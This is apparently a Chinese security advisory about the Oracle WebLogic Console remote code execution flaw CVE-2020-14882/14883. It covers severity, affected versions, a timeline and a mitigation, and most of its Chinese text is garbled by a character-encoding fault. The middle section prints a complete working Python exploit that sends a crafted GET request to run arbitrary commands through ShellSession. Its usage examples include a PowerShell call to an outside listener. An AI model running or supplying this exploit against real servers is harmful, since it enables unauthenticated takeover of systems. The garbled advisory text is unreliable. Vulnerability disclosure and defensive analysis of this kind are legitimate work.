¡¾¸üС¿CVE-2020-14882 | WebLogicÔ¶³Ì´úÂëÖ´ÐÐÎó²îͨ¸æ

Ðû²¼Ê±¼ä 2020-10-30

0x00 Îó²î¸ÅÊö

CNVD   ID

CVE-2020-14882

ʱ      ¼ä

2020-10-30

Àà     ÐÍ

RCE

µÈ      ¼¶

¸ßΣ

Ô¶³ÌʹÓÃ

ÊÇ

Ó°Ïì¹æÄ£


 

WebLogic ServerÊÇÃÀ¹úOracle¹«Ë¾µÄÖ÷Òª²úÆ·Ö®Ò»£¬£¬£¬ÆäÖ÷ÒªÓÃÓÚ¿ª·¢¡¢¼¯³É¡¢°²ÅźÍÖÎÀí´óÐÍÂþÑÜʽWebÓ¦Óá¢ÍøÂçÓ¦ÓúÍÊý¾Ý¿âÓ¦Ó㬣¬£¬ÊÇÉÌÒµÊг¡ÉÏÖ÷ÒªµÄJava(J2EE)Ó¦ÓÃЧÀÍÆ÷Èí¼þÖ®Ò» ¡£¡£¡£¡£¡£¡£

 

0x01 Îó²îÏêÇé

image.png

 

2020Äê10ÔÂ28ÈÕ£¬£¬£¬OracleÐû²¼µÄ10ÔÂÇå¾²¸üÐÂÖеÄOracle WebLogic Server Ô¶³Ì´úÂëÖ´ÐÐÎó²î£¨CVE-2020-14882£©POC±»¹ûÕ棬£¬£¬Ô¶³Ì¹¥»÷Õß¿ÉÒÔͨ¹ý·¢ËͶñÒâµÄHTTP GET ÇëÇó ¡£¡£¡£¡£¡£¡£ÀÖ³ÉʹÓôËÎó²îµÄ¹¥»÷Õß¿ÉÔÚδ¾­Éí·ÝÑéÖ¤µÄÇéÐÎÏ¿ØÖÆ WebLogic Server Console £¬£¬£¬²¢Ö´ÐÐí§Òâ´úÂë ¡£¡£¡£¡£¡£¡£

2020Äê10ÔÂ29ÈÕ, OracleÐû²¼µÄÎó²î²¹¶¡CVE-2020-14882±£´æ¿ÉÈƹýµÄ0dayÎó²î ¡£¡£¡£¡£¡£¡£¼´ÔÚWeblogic²¹¶¡¸üÐÂÍê³Éºó£¬£¬£¬¹¥»÷ÕßÈÔ¿ÉÈƹýWebLogicºǫ́µÇ¼µÈÏÞÖÆ£¬£¬£¬²¢¿ØÖÆWeblogicЧÀÍÆ÷ ¡£¡£¡£¡£¡£¡£Ôì³ÉµÄΣº¦ºÍΣº¦¼«´ó ¡£¡£¡£¡£¡£¡£Îó²îÏêÇéÈçÏ£º

Îó²î±àºÅ

²úÆ·

×é¼þ

ÆÀ·Ö

Ó°Ïì¹æÄ£

CVE-2020-14882

Oracle WebLogic Server

Console

9.8

10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0,   14.1.1.0.0

CVE-2020-14883

Oracle WebLogic Server

Console

7.2

10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0,   14.1.1.0.0

 

Ïà¹ØEXPÈçÏ£º

 

#!/usr/bin/python3

 

# Exploit Title: Oracle WebLogic Server 10.3.6.0.0 / 12.1.3.0.0 / 12.2.1.3.0 / 12.2.1.4.0 / 14.1.1.0.0  - Unauthenticated RCE via GET request

# Exploit Author: Nguyen Jang

# CVE: CVE-2020-14882

# Vendor Homepage: https://www.oracle.com/middleware/technologies/weblogic.html

# Software Link: https://www.oracle.com/technetwork/middleware/downloads/index.html

 

# More Info: https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf

 

import requests

import sys

 

from urllib3.exceptions import InsecureRequestWarning

 

if len(sys.argv) != 3:

    print("[+] WebLogic Unauthenticated RCE via GET request")

    print("[+] Usage : python3 exploit.py http(s)://target:7001 command")

    print("[+] Example1 : python3 exploit.py http(s)://target:7001 \"nslookup your_Domain\"")

    print("[+] Example2 : python3 exploit.py http(s)://target:7001 \"powershell.exe -c Invoke-WebRequest -Uri http://your_listener\"")

    exit()

 

target = sys.argv[1]

command = sys.argv[2]

 

request = requests.session()

headers = {'Content-type': 'application/x-www-form-urlencoded; charset=utf-8'}

 

print("[+] Sending GET Request ....")

 

GET_Request = request.get(target + "/console/images/%252E%252E%252Fconsole.portal?_nfpb=false&_pageLable=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(\"java.lang.Runtime.getRuntime().exec('" + command + "');\");", verify=False, headers=headers)

 

print("[+] Done !!")

 

0x02 ´¦Öóͷ£½¨Òé

ÔÝʱ²½·¥£º

ÓÉÓÚ¸ÃÎó²îµÄ²¹¶¡±£´æ±»ÈƹýµÄΣº¦£¬£¬£¬½¨ÒéÔÝʱ¹Ø±Õºǫ́/console/console.portal¶ÔÍâ»á¼û ¡£¡£¡£¡£¡£¡£


0x03 ²Î¿¼Á´½Ó

https://www.oracle.com/security-alerts/cpuoct2020.html

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14882

https://packetstormsecurity.com/files/159769/Oracle-WebLogic-Server-Remote-Code-Execution.html


0x04 ʱ¼äÏß

2020-10-20  OracleÐû²¼Ç徲ͨ¸æ

2020-10-21  VSRCÐû²¼Ê®Ô²¹¶¡¸üÐÂÇ徲ͨ¸æ

2020-10-28  Îó²îPOC±»¹ûÕæ

2020-10-29  Îó²î²¹¶¡±»Ì»Â¶±£´æÈƹý0day

2020-10-30  VSRCÐû²¼Ç徲ͨ¸æ

 

0x05 ¸½Â¼

 

CVSSÆÀ·Ö±ê×¼¹ÙÍø£ºhttp://www.first.org/cvss/

 

 

 

image.png